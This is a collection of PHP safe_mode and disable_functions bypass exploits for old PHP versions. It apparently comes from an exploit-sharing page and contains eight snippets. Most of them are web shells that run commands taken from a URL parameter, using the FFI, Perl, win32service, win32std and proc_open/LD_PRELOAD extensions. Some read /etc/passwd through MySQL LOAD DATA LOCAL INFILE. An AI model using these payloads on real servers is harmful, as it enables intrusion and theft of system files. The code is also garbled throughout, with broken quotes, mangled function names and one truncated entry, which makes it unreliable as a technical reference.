1-php <= 4.4.7/5.2.3 mysql/mysqli Safe Mode Bypass Vulnerability
<?phpfile_get_contents ('/etc/passwd '); $l = mysql_connect ("localhost", "root"), mysql_query ("Create DATABASE a"), mysql_query ("Create TABLE a.a (a varchar (1024) )"); mysql_query ("GRANT Select,insert on A.A to ' aaaa ' @ ' localhost '); Mysql_close ($l); mysql_connect ("localhost", "AAAA"); mysql_query ("LOAD DATA LOCAL INFILE '/etc/passwd ' into TABLE a.a"); $result = mysql_query ("Select a From A.A"); while (list ($row) = Mysql_fetch_row ($result)) print $row. Chr (?>);
2-mysql
<?phpfunction R ($fp, & $buf, $len, & $err) {print fread ($fp, $len);} $m = new mysqli (' localhost ', ' aaaa ', ', ' a ‘); $m->options (Mysqli_opt_local_infile, 1); $m->set_local_infile_handler ("R"); $m->query ("LOAD DATA LOCAL INFILE '/etc/passwd ' into TABLE a.a"); $m->close ();?>
3-php FFI Extension safe_mode Bypass Exploit
<?php if (!extension_loaded (' ffi ')) die (' error:ffi extension are not loaded! '); $command = (Empty ($_get[' cmd ')))? ' Dir ': $_get[' cmd ']; if (Is_writeable (DirName (__file__))) $tmp =dirname (__ file__); ElseIf (Is_writeable (Ini_get (' Session.save_path ') )) $tmp =ini_get (' Session.save_path '); ElseIf (is_writeable (Ini_get (' Upload_tmp_dir '))) $tmp =ini_get (' Upload_tmp_dir '); Else die (' Error:move exploit to writeable folder. '); $output = "$tmp \ \". Uniqid (' NJ '); $api =new ffi ("[lib= ' Kernel32.dll '] int winexec (char *app,int SW);"); $res = $api->winexec ("cmd.exe/c $command >\" $output \ "", 0); while (!file_exists ($output)) sleep (1); $con = "; $FP =fopen ($output, ' R '); while (!feof ($FP)) $con. =fgets ($FP, 1024); Fclose ($FP); $con =htmlspecialchars ($con); echo "<pre> $con </pre>"; Unlink ($output);?>
4-php 5.2.4 ioncube extension safe_mode and disable_functions protections Bypas
$MyBoot _ioncube = Ioncube_read_file ($path. " Boot. ini "); echo $MyBoot _readfile; echo "<br><br>ioncube output:<br><br>"; echo $MyBoot _ioncube;?>
5–php Perl Extension Safe_mode Bypass
<?php if (!extension_loaded (' Perl ')) Die (' Perl extension are not loaded '); if (!isset ($_get)) $_get=& $HTTP _get_vars; if (Empty ($_get[' cmd '))) $_get[' cmd ']= (Strtoupper (substr (php_os,0,3)) = = ' WIN ')? ' Dir ': ' ls '; $perl =new Perl (); echo "<textarea rows= ' cols= ' >"; $perl->eval ("System ('". $_get[' cmd ') ."‘)"); echo "</textarea>"; $_get[' cmd ']=htmlspecialchars ($_get[' cmd '); echo "<br><form>cmd: <input type=text name=cmd value= '". $_get[' CMD ']. "' Size=25></form> '?" >
6-php 5.x (win32service) Local Safe Mode Bypass Exploit
<?php $command = (isset ($_get[' cmd '))) $_get[' cmd ']: ' dir '; #cammand $dir =ini_get (' Upload_tmp_dir '); #Directory to store command's output if (!extension_loaded (' Win32service ')) die (' win32ser Vice extension not found! '); $name = $dir. " \ \ ". Uniqid (' NJ '); $n =uniqid (' NJ '); $cmd = (Empty ($_server[' ComSpec '))? ' D:\\windows\\system32\\cmd.exe ': $_server[' ComSpec ']; Win32_create_service (' service ' = $n, ' Display ' + $n, ' path ' = ' $cmd, ' params ' = '/'/' $command >\ ' $ Name\ "")); Win32_start_service ($n); Win32_stop_service ($n); Win32_delete_service ($n); $exec =file_get_contents ($name); Unlink ($name); echo "<pre>". Htmlspecialchars ($exec). " </pre> ";?>
7–php 5.2.3 win32std extension safe_mode and disable_functions protections Bypass
<?php if (!extension_loaded ("win32std")) Die ("win32std extension required!"); System ("cmd.exe"); Just to being sure that protections work well win_shell_execute (". \\.. \\.. \\.. \\windows\\system32\\cmd.exe ");?>
8-php Safe_mode Bypass via Proc_open () and custom Environmen
<?php$path= "/var/www"; Change to your writable path $a =open ($path. " /.comm "," w "); Fputs ($a, $_get["C"]); Fclose ($a); $descriptorspec = Array ( 0--> Array ("Pipe", "R"), 1 => Array ("File", $path. " /output.txt "," W "), 2 => Array (" File ", $path." /errors.txt "," a "); $cwd = '. '; $env = Array (' Ld_preload ' => $path. " /a.so "); $process = Proc_open (' id >/tmp/a ', $descriptorspec, $pipes, $CWD, $env); Example Command-should not succeed sleep (1); $a =fopen ($path. " /.comm1 "," R "); echo "<strong>"; while (!feof ($a)) {$b =fgets ($a); echo $b;} fclose ($a); >
PHP SAFE MODE BYPASS